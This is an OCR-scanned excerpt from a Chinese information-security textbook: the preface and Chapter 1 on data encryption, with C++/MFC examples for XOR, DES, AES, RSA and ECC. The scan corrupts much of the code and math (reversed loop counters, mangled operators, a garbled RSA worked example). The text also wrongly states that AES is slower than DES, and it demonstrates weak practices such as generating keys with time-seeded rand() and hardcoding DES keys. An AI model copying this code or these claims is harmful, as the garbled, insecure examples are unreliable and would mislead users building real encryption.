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信息 安全 有 比较 广泛 的 应 用 。 本 书 是 作者 根据 近 几 年 在 学 校 任教 和 在 紫光 慧 图 工作 期 
间 经 验 的 综合 ， 针 对 高 等 院 校 信息 安全 及 信息 技术 类 相关 本 科 / 专 科 专 业 课 程 特 点 ， 从 实验 
教学 实用 性 出 发 ， 以 培养 和 锻炼 学 生 网 络 信息 安全 技术 实际 动手 能 力 和 创新 能 力 为 目标 编 
写 而 成 。 本 书 力争 理论 与 实践 的 紧密 结合 ， 多 讲 一 些 基本 技能 的 培养 。 全 书 讲述 了 常用 加 
密 算法 的 使 用 、 软 件 常用 的 知识 产权 保护 方法 、 病 毒 尤其 是 文件 型 病毒 所 使 用 的 技术 、 从 
介绍 木马 技术 角度 ， 介 绍 了 远程 控制 的 原理 与 实现 和 最 基本 的 网 络 安全 编程 ， 首 次 在 信息 
安全 教程 中 引入 了 文档 安全 。 文 档 安全 是 近 几 年 出 现 的 一 项 应 用 ， 主 要 用 来 确保 本 单位 的 
文档 在 被 非 本 单位 使 用 中 处 于 可 控 状 态 。 本 书 较为 详尽 地 介绍 了 这 方面 的 应 用 。 

本 书 可 作为 信息 安全 、 网 络 工程 及 计算 机 应 用 本 科 / 专 科 实 验 教 材 ， 也 可 作为 网 络 信息 
安全 职业 技术 培训 实验 教材 ， 亦 适合 于 企 事业 单位 的 网 络 安全 管理 人 员 、 信 息 系统 管理 人 
员 以 及 其 他 相关 专业 技术 人 员 阅 读 和 参考 。 

概括 起 来 ， 本 书 具 有 以 下 主要 特点 : 

o 结构 清晰 、 内 容 翔 实 。 在 每 一 章 的 开始 概要 说 明了 本 章 将 介绍 的 内 容 ， 使 学 习 者 
做 到 心中 有 数 ， 每 介绍 一 种 应 用 ， 首 先 介 绍 其 基本 原理 ， 然 后 举 出 一 个 应 用 实例 ， 
结合 紧密 ， 不 会 使 人 觉得 接受 困难 。 

e 首次 引入 了 文档 安全 。 紫 光 慧 图 的 赵 学 先生 提出 了 要 在 信息 安全 产品 中 实现 “ 整 
个 信息 生命 周期 ”都 能 保证 信息 安全 的 构想 ， 因 此 本 人 能 有 幸 在 其 构想 下 去 实现 
整个 解决 方案 中 的 部 分 功能 。 本 书 文档 安全 的 例子 就 来 源 于 紫光 慧 图 。 

° 每 一 章 最 后 提供 有 习题 。 通 过 完成 这 些 习题 ， 可 以 使 学 习 者 更 好 地 掌握 本 章 介绍 
的 内 容 。 

本 书 共 分 6 章 ， 第 1 章 介 绍 数据 加 密 的 常用 算法 的 概念 和 使 用 方法 ;第 2 章 介 绍 软件 
保护 知识 产权 用 到 的 基本 防护 方法 ， 第 3 章 重 点 介绍 文件 型 病毒 的 原理 与 防范 措施 ， 网 络 
型 病毒 的 一 个 实例 放 到 了 最 后 一 章 ; 第 4 章 是 通过 介绍 木马 来 介绍 如 何 实现 远程 控制 ， 第 
5 章 介绍 文档 安全 ， 目 前 对 文档 安全 编程 的 需求 量 挺 大 ， 但 很 多 教程 都 还 没有 涉猎 ; 第 6 
章 介绍 网 络 安全 方面 的 基本 应 用 。 

除了 封面 署名 的 作者 外 ， 参 加 本 书 编写 和 制作 的 人 员 还 有 和 孙 之 芳 、 李 福 伟 、 王 珊 、 赵 
省 治 、 刘 厚 力 、 付 伟 、 宋 现 伟 、 庞 西 芝 、 高 绘 绘 、 吴 华 、 方 瑞 铭 、 乌 拉 拉 、 陈 道贺 、 张 鸿 、 
赵 少林 、 张 鸿 彦 、 王 欣 、 李 志 超 、 施 兴 家 等 人 。 

在 编写 本 书 的 过 程 中 参考 了 相关 文献 ， 在 此 向 这 些 文献 的 作者 深 表 感谢 。 由 于 时 间 较 
紧 ， 书 中 难免 有 错误 与 不 足 之 处 ， 奶 请 专家 和 广大 读者 批评 指正 。 我 们 的 信箱 是 
huchenhao@263.net， 电 话 是 010-62796045. 
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第 1 章 ”数据 安全 


本 章 介绍 如 何 对 数据 加 密 ， 内 容 包 括 : 

° 加 密 解 密 的 基本 概念 ; 

° ”如 何 熟练 地 使 用 VS 结合 以 前 的 C 和 C++ 知识 写 代 码 ; 
e DES. AES. SCB2 加 密 算法 的 运用 ; 

e RSA 和 ECC 加密 算法 的 运用 ; 

e MDS 和 SHA 算法 的 运用 ; 

e ”如何 综合 地 运用 本 章 的 知识 。 


11 数据 安全 概述 


数据 安全 的 基础 是 加 密 。 研究 加 密 的 是 密码 学 (Cryptology)。 密码 学 是 研究 加 密 和 解密 
变换 的 一 门 科 学 。 通 常情 况 下 ， 人 们 将 可 懂 的 数据 或 消息 称 为 明文 (Plaintext)， 将 明文 变换 
成 不 可 懂 的 数据 称 为 密 文 (Ciphertext)。 把 明文 变换 成 密 文 的 过 程 叫 加 密 (Encryption); 其 逆 
过 程 ， 即 把 密 文 变换 成 明文 的 过 程 叫 解密 (Decryption)。 明 文 与 密 文 的 相互 变换 是 可 逆 的 变 
换 ， 并且 只 存在 唯一 的 、 无 误差 的 可 北 变 换 。 完 成 加 密 和 人 解密 的 函数 称 为 密码 算法 
(Algorithm). 在 计算 机 上 实现 的 数据 加 密 算法 , 其 加 密 或 解密 变换 是 由 密 钥 (Key) 来 控制 的 。 
密 钥 是 由 使 用 密码 体制 的 用 户 随机 选取 的 ， 密 钥 成 为 唯一 能 控制 明文 与 密 文 之 间 变 换 的 关 
键 ， 它 通常 是 一 随机 数据 串 ， 主 要 分 为 对 称 密码 系统 密 钥 和 非 对 称 密码 系统 密 钥 。 

1. 对 称 密码 系统 (Symmetric cryptosystem) 


如 果 一 个 密码 系统 的 加 密 密 钥 和 解密 密 钥 相同 ， 则 称 为 对 称 密码 加 密 系统 ， 也 叫 单 密 
钥 系统 或 私 钥 密码 系统 。 它 使 用 单个 密 钥 ， 既 用 于 加 密 ， 也 用 于 解密 。 对 称 密 钥 加 密 是 加 
密 大 量 数据 的 一 种 行 之 有 效 的 方法 。 

对 称 密码 加 密 有 许多 种 算法 ， 例 如 DES. AES 等 。 但 所 有 这 些 算法 都 有 一 个 共同 的 目 
的 ， 以 可 还 原 的 方式 将 明文 转换 为 密 文 。 密 文 使 用 加 密 密 钥 编码 ， 对 于 没有 解密 密 钥 的 任 
何人 来 说 它 都 是 没有 意义 的 。 由 于 对 称 密码 加 密 系统 在 加 密 和 解密 时 使 用 相同 的 密 钥 ， 所 
以 这 种 加 密 过 程 的 安全 性 取决 于 是 否 能 保证 密 钥 的 安全 。 

SCB2( 也 叫 SM1) 算 法 是 由 国家 密码 管理 局 编制 的 一 种 商用 密码 分 组 标准 对 称 算法 。 
该 算法 是 国家 密码 管理 部 门 审批 的 SM1 分 组 密码 算法 ,分 组 长 度 和 密 钥 长 度 都 为 128 比特 ， 
算法 安全 保密 强度 及 相关 软 硬 件 实现 性 能 与 AES 相当 。 目前 采用 该 算法 已 经 研制 出 了 系列 
芯片 、 智 能 IC 卡 、 智 能 密码 钥匙 、 加 密 卡 、 加 密 机 等 安全 产品 ， 这 些 产 品 广泛 应 用 于 电子 
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政务 、 电 子 商务 及 国民 经 济 的 各 个 应 用 领域 。 
2. 非 对 称 密码 系统 (Asymmetric cryptosystem) 


非 对 称 密码 系统 使 用 两 个 密 钥 ， 分 为 公 铀 和 私 钥 ， 这 两 个 密 钥 在 数学 上 是 相关 的 。 非 
对 称 密码 系统 也 叫 双 钥 密码 系统 或 公 钥 密码 系统 。 

在 非 对 称 密码 系统 应 用 中 , 公 钥 可 在 通信 双方 之 间 公 开 传递 , 或 在 公用 储备 库 中 发 布 ， 
但 相关 的 私 钥 是 保密 的 。 只 有 使 用 私 钥 才能 解密 用 公 钥 加 密 的 数据 ， 使 用 私 钥 加 密 的 数据 
只 能 用 公 角 解密。 该 算法 被 广泛 用 在 数字 签名 中 。 

RSA 公 钥 加 密 算法 是 1977 年 由 Ron Rivest, Adi Shamirh 和 LenAdleman 在 美国 麻 省 
理工 学 院 开 发 的 。RSA 取 名 来 自 这 3 人 的 名 字 。RSA 是 非常 有 影响 力 的 公 钥 加 密 算 法 ， 已 
被 ISO 推荐 为 公 钥 数据 加 密 标 准 。RSA 算法 基于 一 个 十 分 简单 的 数论 事实 : 给 定 两 个 素数 
Dp、q， 很 容易 相 乘 得 到 mn， 而 对 n 进行 因 式 分 解 却 相 对 困难 ， 因 此 可 以 将 乘积 公开 作为 加 
密 密 钥 。RSA 算法 是 第 一 个 能 同时 用 于 加 密 和 数字 签名 的 算法 ， 也 易于 理解 和 操作 ; 但 是 
速度 较 慢 ， 运 算 开 销 大 。 

椭圆 曲线 密码 体制 来 源 于 对 椭圆 曲线 的 研究 ， 所 谓 椭圆 曲线 指 的 是 由 韦 尔 斯 特 拉 斯 
(Weierstrass) 方 程 


৮ a) 
所 确定 的 平面 曲线 。 其 中 系数 aiGi=12…,6) 定 义 在 某 个 域 上 ， 可 以 是 有 理 数 域 、 实 数 
域 、 复 数 域 ， 还 可 以 是 有 限 域 Gr(pr)， 椭 圆 曲 线 密码 体制 中 用 到 的 椭圆 曲线 都 是 定义 在 有 
限 域 上 的 。 
椭圆 曲线 上 所 有 的 点 外 加 一 个 叫做 无 穷 远 点 的 特殊 点 构成 的 集合 ， 连 同一 个 定义 的 加 
法 运算 构成 一 个 Abel 群 。 在 等 式 
mP=P+P+...+P=Q Q) 
中 ， 已 知 m 和 点 了 求 点 Q 比较 容易 ， 反 之 已 知 点 Q 和 点 了 求 m 却 是 相当 困难 的 ， 这 个 问 
题 称 为 椭圆 曲线 上 点 群 的 离散 对 数 问题 。 椭 圆 曲 线 密码 体制 正 是 利用 这 个 困难 问题 设计 而 
来 。 椭圆 曲线 应 用 到 密码 学 上 最 早 是 由 Neal Koblitz 和 Victor Miller 在 1985 年 分 别 独 立 提 
出 的 。 
2010 年 年 底 的 时 候 , 在 国家 密码 管理 局 的 网 站 上 公布 了 基于 椭圆 曲线 ECC 的 SM2 Z: 
开 密 钥 国 密 算法 和 SM3 杂凑 算法 。 加 上 原来 的 SM1(SCB2) 商 密 对 称 算法 ， 中 国定 义 的 数 
据 安全 加 密 算法 终于 走向 成 熟 。 以 无 线 局 域 网 产品 为 例 , 按照 国家 密码 管理 局 公告 (第 7 号 ) 
须 采 用 下 列 经 批准 的 密码 算法 : 对 称 密码 算法 为 SMS4、 签 名 算法 为 ECDSA、 密 钥 协 商 算 
法 为 ECDH、 杂 凑 算 法 为 SHA-256、 随 机 数 生成 算法 可 以 自行 选择 。 
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本 节 介 绍 编写 信息 安全 程序 最 常用 的 语言 知识 。 以 使 用 C 和 C++ 为 例 , 我 们 在 VS2008 


下 进行 开发 ， 一 般 涉及 到 以 下 知识 。 
1. 常用 的 C 语言 知识 


(D 常用 数据 类 型 
字 节 类 型 有 char. BYTE; 字 节 指针 类 型 有 char 和 BYTE*。 
整形 有 int, DWORD: 整形 指针 有 int* 和 DWORD *。 
(2) 结构 的 声明 、 定 义 和 使 用 
结构 是 相关 数据 的 组 合 ， 是 一 种 自 定义 的 数据 类 型 。 例 如 ， 结 构 AAA 的 声明 如 下 。 
typedefstruct AAA( 
int x; 
char y; )JAAA: 
定义 AAA 类 型 的 结构 变量 a， 定 义 方式 如 下 : 
AAA a; 
变量 a 的 使 用 如 下 : 
ax-5; 
a.y=6; 
(3) 常用 命令 举例 
int x=sizeofinb: /sizeof RH! int 占用 的 字 节 长 度 
for(int i=0;i<100;i++)x+=iJ/for 是 循环 命令 
dof 
মাল 
if(i—100)break://break 是 从 循环 中 退出 的 命令 
HT; 
}while(TRUE)://do-while 是 循环 命令 
(4) 函数 的 定义 、 调 用 。 传 参数 方式 有 传 值 、 传 地 址 、 传 引用 。 
(5) 指针 是 无 符号 32 位 整数 (对 32 位 系统 而 言 )， 是 变量 的 地 址 。 例 如 : 
int x-5: 
int *px-&x: 
(6) 字符 串 操作 
字符 串 表 示 方 式 有 ASCH 码 与 Unicode 方式 。 前 者 一 个 字 节 表示 一 个 字符 ， 后 者 两 个 
字 节 表示 一 个 字符 。 定 义 字 符 串 举例 : 
char *s1="abcd": /ASCII 方 式 
wchar t *s2-L"qqqq": //Unicode 方式 
char ss1[300]: 
字符 串 的 使 用 如 下 : 
strcpy(ss1. "qqqq"):// 字 符 串 的 拷贝 
strcat(ss1, "vvvvv"); // 字 符 串 的 附加 
printflss1):// 输 出 到 屏幕 
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2. 常用 的 C++ 语言 知识 


0) 类 
-类 事物 的 抽象 ， 其 中 包含 了 类 成 员 函 数 与 数据 成 员 。 
下 面 声明 的 类 AAA 中 ， 包 含 了 公有 (public) 数 据 成 员 x 和 成 员 函 数 09০ 
class AAA{ 
public: int x; 
int GetA(int a); 
k 
Q) 类 对 象 的 定义 和 使 用 
下 面 分 别 举例 使 用 静态 方式 定义 的 类 对 象 a 和 动态 方式 定义 的 类 对 象 指针 p， 并 使 用 
它们 。 


AAA a; /| 静态 方式 分 配 内存 ， 定 义 AAA 类 型 的 对 象 8 
a.x=5; // 赋 值 

AAA *p=new AAAQ: /动态 方式 分 配 内 存 定义 对 象 指针 P， 可 以 随时 释放 
了 ->x=5: /赋值 

delete p; /释放 p 所 指 对 象 占用 的 内 存 空间 


(3) 静态 与 动态 方式 定义 类 对 象 的 异同 

在 函数 中 使 用 静态 方式 定义 类 对 象 ， 只 有 在 该 函数 执行 结束 后 才 释 放 掉 该 类 对 象 所 占 
用 的 内 存 空间 。 而 动态 方式 则 可 以 在 任何 不 需要 该 对 象 的 时 候 使 用 delete 删除 其 所 占用 的 
内 存 空 间 。 


3. 使 用 VS 建立 工程 过 程 


0) 建立 对 话 框 应 用 程序 
使 用 VS 建立 对 话 框 应 用 程序 的 步骤 为 : 新 建 3》 项 目 >VC++>MFC 应 用 程序 。 添 加 
按钮 、 编 辑 按钮 下 的 代码 。 右 键 选中 可 以 编辑 属性 、 双 击 可 以 编辑 对 应 的 代码 ( 单 击 按钮 后 
执行 的 代码 )。 程 序 的 执行 :调试 > 开始 执行 。 过 程 如 图 1-1 和 1-2 所 示 。 
单 击 按钮 后 执行 的 函数 如 下 : 
void CtttDlg::OnBnClickedButton10 
{ 
MessageBox("hello"): 
} 
:表示 作用 域 ， 即 后 者 是 前 者 的 一 部 分 ， 是 成 员 。 
void 是 类 的 方法 的 返回 值 类 型 ，CtttDlg 为 类 名 , OnBnClickedButton10 为 类 的 一 个 方法 。 


应 用 程序 闪 型 wast. 
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1-1 建立 工程 


程序 结构 如 下 : 

stdafx.h 函数 的 头 文件 引用 ; 

*h 应 用 程序 的 类 声明 ; 
*.cpp 应 用 程序 的 类 定义 ; 

*Dlgh 应 用 程序 窗口 的 类 声明 ; 
*Dlg.cpp 应 用 程序 窗口 的 类 定义 ; 

r 窗口 资源 文件 。 

下 面 是 程序 代码 。 


CtttDlg::CtttDlg(CWnd* pParent /*ZNULL*/) 
: CDialog(CtttDIg:IDD, pParenb /后 者 表示 基 类 
/窗口 的 构造 函数 (完成 初始 化 ) 
BOOL ctttDlg::OnInitDialog0 /对 话 框 初始 化 
void CtttDlg::OnBnClickedButton10”// 单 击 按钮 后 执行 的 函数 
void CzhaoDlg::OnBnClickedButton10) 
{ 
// 加 密 的 代码 在 此 
MessageBox(L" 加 密 "); — /L 表示 用 Unicode 字符 方式 
} 
void CzhaoDlg::OnBnClickedButton2() 
t 
/解密 的 代码 在 此 
MessageBox(L "解密 "): 


৮০ 
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1-2 生成 界面 


(2) VC 中 操作 字符 串 的 类 CString 
类 似 Java 中 的 string。 有 问题 查 MSDN 
CString s-"abcdef": /初始 化 。 注 意 大 小 写 
char *p-"hhhhhh": 
St-p: 
(3) VC 中 操作 文件 的 类 CFile 
CFile 印 ;// 建 立 类 对 象 。 
fp.Open 有 新 建 、 读 、 写 、 读 写 4 种 方式 。 
fp.Seek 移动 文件 指针 。 文 件 指针 是 读 写 的 起 始 位 置 。 刚 打开 文件 ， 为 0， 读 
向 后 移动 n 字 节 。 


^5. 


写 n 字 节 
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fp.Read 读 文 件 到 内 存 。 
fp.Write 写 内 存 数 据 到 文件 。 


13 ”最 简单 的 加 密 解密 


在 实际 软件 开发 中 ， 如 果 对 被 保护 的 数据 安全 要 求 不 高 ， 可 以 采用 比较 简单 的 加 密 方 
式 ， 速 度 快 而 且 编程 简单 。 主 要 有 3 种 方式 ， 本 书 只 介绍 异 或 和 移 位 两 种 方式 。 
(1) 异 或 
设 明文 数据 为 0x31， 与 密 钥 0xff 进行 异 或 运算 则 变 为 0xce， 解 密 时 则 与 密 钥 再 进行 
异 或 一 次 ， 数 据 恢复 为 原来 值 。 用 C++ 实现 加 密 解 密 代码 如 下 。 
BYTE e=0x31; // 明 文 ，BYTE 是 无 符号 字 节 
BYTE m=0x31^0xff=0xce;// 密 文 
BYTE r=0xce^0xff=0x31;// 恢 复 为 明文 
(2) 移 位 
设 明文 数据 为 0x31323334， 循 环 右 移 位 5 位 ， 变 为 数据 0xa1899199， 再 循环 左 依 位 5 
位 ， 恢 复原 来 的 值 0x31323334。 左 移 和 右 移 分 别 使 用 << 和 >> 完 成 。 
下 面 的 代码 演示 了 如 何 对 文件 aaa txt 进行 异 或 加 密 解 密 。 
CFile fp: 
fp.Open(L"C:\\aaa.txt", CFile::modeReadWrite): 
int len=(int)fp.GetLengthO; 
BYTE *p-new BYTE[len]; 
fp.Read(p. len): 
for(int i=0; i<len : i--)p[i]^-Oxff: 
fp.SeekToBegin(): 
fp.Write(p. len): 
fp.Close(: 
delete []p: 


解密 代码 和 上 面 的 完全 一 样 。 


14 DES 加 密 算法 使 用 


1971 年 美国 学 者 塔 奇 曼 (Tuchman) 和 麦 耶 (MeyeD 根 据 信 息 论 创始 人 香农 (Shannon) 提 出 
的 “多 重 加 密 有 效 性 理论 ”创立 了 DES 加 密 算 法 ， 后 于 1977 年 由 美国 国家 标准 局 颁布 。 

DES 算法 在 POS、 磁卡 及 智能 卡 (IC F). 加 油 站 、 高速 公路 收费 站 等 领域 被 广泛 应 用 ， 
以 实现 关键 数据 的 保密 ， 如 信用 卡 持 卡 人 的 PIN 的 加 密 传输 ，IC 卡 与 POS 间 的 双向 认证 、 
金融 交易 数据 包 的 MAC 校 验 等 ， 均 用 到 DES 算法 。 
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DES 算法 把 64 比特 的 明文 输入 块 变 为 64 位 的 密 文 输出 块 。 如 果 明 文 长 于 64 比特 ， 
则 分 组 为 每 组 64 位 ， 不 足 则 用 0 补 够 64 位 。 密 钥 也 是 64 位 的 。 

假如 别人 给 了 我 们 一 个 DES 的 开发 包 , 该 怎么 用 呢 ? 首先 看 一 下 该 类 的 头 文件 , 代码 
如 下 : 


class CDes 
{ 
public: 
CDes0: 
virtual ~CDes(): 
bool DoDes(char *Out. char *In. long datalen. const char *Key. int keylen. bool Type): 
private: 
void DES(char 00118], char In[8]. const PSubKey pSubKey, bool Type): 
void SetKey(const char* Key, int len);// 设置 密 钥 
void SetSubKey(PSubKey pSubKey, const char Key[8]):// 设置 子 密 钥 
void F func(bool In[32]. const bool Ki[48]):// f 函数 
void S func(bool Out[32], const bool In[48]):// S 盒 代替 
void Transform(bool *Out, bool *In, const char *Table, int len):// 变换 
void Xor(bool *InA, const bool *InB, int len):// 异 或 
void RotateL(bool *In, int len, int loop):// 循环 左 移 
void ByteToBit(bool *Out, const char *In, int bits);// 字 节 组 转换 成 位 组 
void BitToByte(char *Out const bool *In. int bits);// 位 组 转换 成 字 节 组 
除了 构造 函数 和 析 构 函数 ， 只 有 一 个 公有 函数 ， 即 加 密 解 密使 用 的 函数 DoDes。 
先 把 CDes.h fll CDes.cpp 复制 到 程序 的 子 目录 下 ,然后 在 对 话 框 类 定义 文件 中 加 入 语句 : 
#include "CDes.h" 
然后 在 按钮 的 消息 函数 中 可 以 添加 如 下 加 密 解 密 代码 : 


BYTE key[8]={0x34.0x88.0xf7.0x99.0x6d.0xa5.0x7b.0x96}: ” // 密 钥 
CFile fp: 

fp.Open(L"C:Waaa txt". CFile:modeReadWrite); /可 读 可 写 方式 打开 文件 
intlen-(nüfp.GetLength); — // 取 文件 长 度 

int realLen-len: 

if(len%8)len+=(8-len%8): 

len+=8: /对 齐 ， 最 后 8 字 节 放 文件 长 度 

BYTE *p=new BYTE[len]: /分 配 内 存 


fp.Read(p. len): // 读 文件 到 内 存 
memcpy(&p[len-8]. &realLen, 4); /把 长 度 复制 到 最 后 8 字 节 
CDes des: 

char *out= new char[len]: 


des.DoDes(out. p. len, key. 8.0): /加 密 ， 输 出 在 out 
fp.SeekToBegin0: /移动 文件 指针 到 最 前 面 
fp.Write(p. len): ISA 
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fp.CloseQ: 
delete []p: 

解密 的 代码 如 下 : 
BYTE key[8]- (0x34.0x88.0xf7.0x99.0x6d.0xa5.0x7b.0x96) 
CFile fp: 
fp.Open(L"C:\\aaa.txt", CFile::modeReadWrite): 
int len=(int)fp.GetLengthO: 
BYTE *p-new BYTE[len]: 
fp.Read(p. len): 
CDes des: 
char *out- new char[len]: 
des.DoDes(out, p, len, key, 8, 1) /最 后 一 个 参数 为 1， 表 示 解 密 
fp.SeekToBegin(): 
fp. Write(p. len): 
int realLen-0; 
memcpy(realLen&, &p[len-8], 4): 
fp.SetLength(realLeny; /记得 此 行 ， 恢 复原 来 文件 长 度 
fp.Close0: 

如 果 要 用 随机 数 产生 密 钥 ， 代 码 如 下 : 
BYTE key[8]: 
srand( (unsigned)time( NULL ) ): 
for(int i70; i«8; i++) key[i]-(BY TE) 18000) : 


1.5 AES 加 密 算法 使 用 


密码 学 中 的 高 级 加 密 标 准 (Advanced Encryption Standard，AES)， 又 称 高 级 加 密 标准 
Rijndael 加 密 法 , 是 美国 联邦 政府 采用 的 一 种 区 块 加 密 标准 。 这 个 标准 用 来 蔡 代 原先 的 DES， 
已 经 被 多 方 分 析 且 广 为 全 世界 所 使 用 。 

该 算法 为 比利时 密码 学 家 Joan Daemen 和 Vincent Rijmen 所 设计 ， 结 合 两 位 作者 的 名 
字 ， 以 Rijndael 命名 。 

AES 加 密 算法 比 DES 速度 慢 ， 且 更 安全 。 常 用 于 企业 文档 的 加 密 。AES 的 基本 要 求 
是 ， 采 用 对 称 分 组 密码 体制 ， 密 钥 长 度 支持 128、192、256 位 ， 分 组 长 度 128 位 。 

AES 加 密 有 很 多 轮 的 重复 和 变换 。 大 致 步骤 如 下 : 密 钥 扩展 (KeyExpansion)、 初 始 轮 
(Initial Round)、 重 复 轮 (Rounds)。 

每 一 轮 又 包括 : SubBytes、ShiftRows、MixColumns、AddRoundKey、 最 终 轮 (Final 
Round)， 最 终 轮 没有 MixColumns。 

下 面 的 AES 加 密 算法 中 ， 密 钥 是 16 字 节 的 。 被 加 密 或 解密 数据 必须 采用 分 组 方式 ， 
每 16 字 节 为 一 组 。 最 后 数据 不 够 16 字 节 时 要 补 齐 。 在 本 书 所 附 代 码 中 有 aes.cpp 和 aes.h 
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文件 ， 可 以 运用 这 两 个 文件 进行 AES 加 密 解 密 。 加 密 代码 如 下 : 


#include "Aes.h" 
BYTE key[16]: 
srand( (unsigned)time( NULL ) ): 
for(int i-0; i«16; i++) key[i]-(BY TE)rand(): /生成 随机 密 钥 ，16 字 节 
Aes aes(16, (unsigned char*)key): //AES 对 象 ， 初 始 化 
long mLen-1024*1024: 
pDat- new BYTE[mLen]: /数据 输入 
pDat2=new BYTE[mLen]: /数据 输出 
CFile fp: 
fp.Open(from.CFile::modeReadWrite): 
int circle-fp.GetLength(/mLen: /循环 的 圈 数 
for(long j=0; j«circle: j++){ 
fp-Read(pDat mLen): // 读 取 个 对 象 ， 每 个 对 象 的 长 度 是 字 节 
for(long i=0:i<(mLen/16):i++) aes.Cipher(pDat+i*16.pDat2+i*16): // 分 组 加 密 
fp.Seek(0-mLen, CFile::current): // 记 得 把 指针 移 回 去 
fp.Write(pDat2, mLen); 
} 
fp.Close0; 
delete []pDat; 
delete []pDat2: 
解密 的 代码 如 下 : 
#include "Aes.h" 
BYTE key[16]-(..): — // 要 事先 知道 
Aes aes(16, (unsigned char*)key): 
long mLen-1024*1024; 
pDat- new BYTE[mLen]: 
pDat2-new BYTE[mLen]: 
CFile fp: 
fp.Open(from.CFile::modeReadWrite): 
int circle-fp.GetLength()/mLen: 
for(long j=0; j«circle: j++){ 
fp.Read(pDat.mLen): / 读 取 对 象 ， 每 个 对 象 的 长 度 是 字 节 
for(long i=0:i<(mLen/16):i+-+) aes. InvCipher(pDat+i*16.pDat2+i*16): /分 组 解密 
fp.Seek(0-mLen. CFile::current): 
fp.Write(pDat2, mLen): 
) 
fp.Close(: 
delete []pDat: 
delete []pDat2: 


注意 : 这 里 没有 考虑 到 解密 后 恢复 到 原来 文件 的 长 度 , 请 读者 自己 参照 DES 中 的 代码 
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L6 RSA 介绍 与 ECC 算法 使 用 


1. RSA 算法 描述 


0) 密 钥 的 产生 

QD 选 两 个 保密 的 大 素数 p 和 q+ 

© 计算 n—=p*q, b (n)Ü=(p-1)*(q-1), HEF b (n): n 的 欧 拉 函数 值 。 

© 选 一 整数 e， 使 满足 1<e< (n), H. ged((n)e)-1. ged( b(n)e)=1 即 是 要 满足 中 (n) 
与 e 互 为 质数 。 

@ 计算 d， 使 满足 dke=l mod (n). 

© 以 fen} 为 公开 钥 ，{d,n} 为 秘密 钥 。 两 个 素数 p 和 q 不 再 需要 ， 应 该 丢弃 ， 不 要 让 
任何 人 知道 。 

(2) 加 密 

先 将 明文 m 按 比特 串 分 组 ， 使 得 每 个 分 组 对 应 的 十 进 制 数 小 于 n， 对 每 组 的 明文 作 加 

加 密 信息 m( 二 进 制 表示 ) 时 ， 设 把 m 分 成 等 长 数据 块 ml.m2,…:mi…， 块 长 为 s， 其 
中 mi<=n，s 尽 可 能 大 。 对 应 的 分 组 密 文 6 是 : 

e; = m/^e(mod n) 

(3) 解密 

mi =e; d(mod n) 

(4) 举例 

XE p=7, q-17. 3K n-p*q-119, H. (n)-(p-)*(q-1)-96. Hi e=5， 满 足 1«ecó(n) H. 
gcd( (n),e)-1. 确定 满足 d*e-1 mod 96 且 小 于 d, 因为 77*5=385=4*96+1, 所 以 选 d 为 77， 
因此 公开 钥 为 {5,119}， 秘 密 钥 为 {77,119}。 设 明文 m=19， 则 由 加 密 过 程 得 到 密 文 为 : 

c=195 mod 119= 2476099 mod 119 =66 

解密 为 : 

6677 mod 119= 19 

2. ECC 算法 描述 


ECC(Elliptic Curves Cryptography, 椭圆 曲线 密码 编码 学 )。 下 面 介绍 一 个 利用 椭圆 曲线 
进行 加 密 通 信 的 过 程 。 

(1) 用 户 A 选 定 一 条 椭圆 曲线 Ep(a,b)， 并 取 椭 圆 曲 线 上 一 点 作为 基点 0০ 

D HP A 选择 一 个 私有 密 钥 k， 并 生成 公开 密 钥 KG. 

(3) 用 户 A 将 Ep(a,b) 和 点 K、G 传 给 用 户 B。 

(4) 用 户 B 接 到 信息 后 ， 将 待 传输 的 明文 编码 到 Ep(a,b) 上 一 点 M( 编 码 方法 很 多 ， 这 
里 不 作 讨论 )， 并 产生 一 个 随机 整数 ৫), 
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(5) HP B 计算 点 CI=MHK;C2=1G. 

(6) H^ B 38 CL, C2 传 给 用 户 A。 

(7) HP A 接 到 信息 后 ， 计 算 Cl-kC2， 结 果 就 是 点 M。 因 为 

C1-kC2=M+rK-k(rG)EM+rK-r(kG)=M 

再 对 点 M 进行 解码 就 可 以 得 到 明文 。 

在 这 个 加 密 通信 中 ， 如 果 有 一 个 偷 宪 者 HH， 他 只 能 看 到 Ep(ab). K, G, Cl. C2, ifj 
通过 K、G 求 k 或 通过 C2、G 求 1 都 是 相对 困难 的 。 因 此 ，H 无 法 得 到 A、B 间 传 送 的 明 
文 信息 。 其 过 程 如 图 1-3 所 示 。 


图 1-3 ECC 加 密 解 密 过 程 


3. ECC 实现 举例 
假设 建立 的 工程 为 MYECC， 把 ECC 加 密 开发 包 中 的 “CRYPTOPP” 放 到 文件 夹 
\myECC\myECC 下 ， 将 ECCENCRYPT.H 和 ECCENCRYPT.CPP 也 放 到 文件 夹 \myECC\ 
myECC 下 ， 如 图 1-4。 
E n: wyproc ECCE গায় 


x A 大 小 পর 

HT A Game > x" 
B © «e c x" 
D us CL JECCENCRYPT. CPP 13 CH 

@ © ClessLibrery! ECCENCRYPT. H 4x c/c 

ও © eryptopp_ECCHME ECC KFS ew us 

ও © -rptopp_test 人 Ech cpp 2) CH 

E Menem ত w em 
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然后 添加 项 目 如 图 1-5 所 示 。 


图 1-5 添加 项 目 
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添加 引用 如 图 1-6 所 示 。 
添加 代码 如 下 ， 分 别 为 生成 密 钥 对 、 加 密 文件 、 解 密 文 件 。 密 钥 对 的 路 径 和 文件 名 与 
该 程序 在 同一 路 径 下 。 
void CECC 加 密 Dlg::OnBnClickedButton10 
{ /生成 缺 省 的 密 钥 对 
CEccEncrypt cee: 
cee.ECCGenerateKey(: 
) 
void CECC 加 密 Dlg::OnBnClickedButton20 
{ /用 公 钥 对 文件 a. txt 加 密 成 b.txt 


#inelude "stdafx.h" 
clude “ECC 加 密 .h” 
Tinclude “ECCHÆDlg. h” 


include "eccEncrvpt.h^ 


|&ifdef DEBUG 
fine new 06800 NEW 


&endif 


Lagma comment (lib, "eryptlib") 
用 于 应 用 程序 “关于 ”菜单 项 的 CAboutDlg 对 话 框 
lclass CAboutDlg : public CDialog 


public: 
08৮০0018107 


图 1-6 添加 引用 


CEccEncrypt cee; 
cee.ECCEncryptFile("a.txt","b.txt"): 

) 

void CECC 加 密 Dlg::OnBnClickedButton30 

{1/ 用 私 钥 把 文件 b.txt 解密 成 c.txt 
CEccEncrypt cee: 
cee.ECCDecryptFile("b.txt" "c.txt"): 

) 


程序 运行 如 图 1-7 所 示 。 


图 1-7 ECC 加 密 解 密 
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17 单 向 散 列 算 法 使 用 


单 向 散 列 函 数 (简称 “了 函数 ”或 “Hash 函数 ”) 用 于 对 要 传输 的 数据 作 运 算 生成 信息 
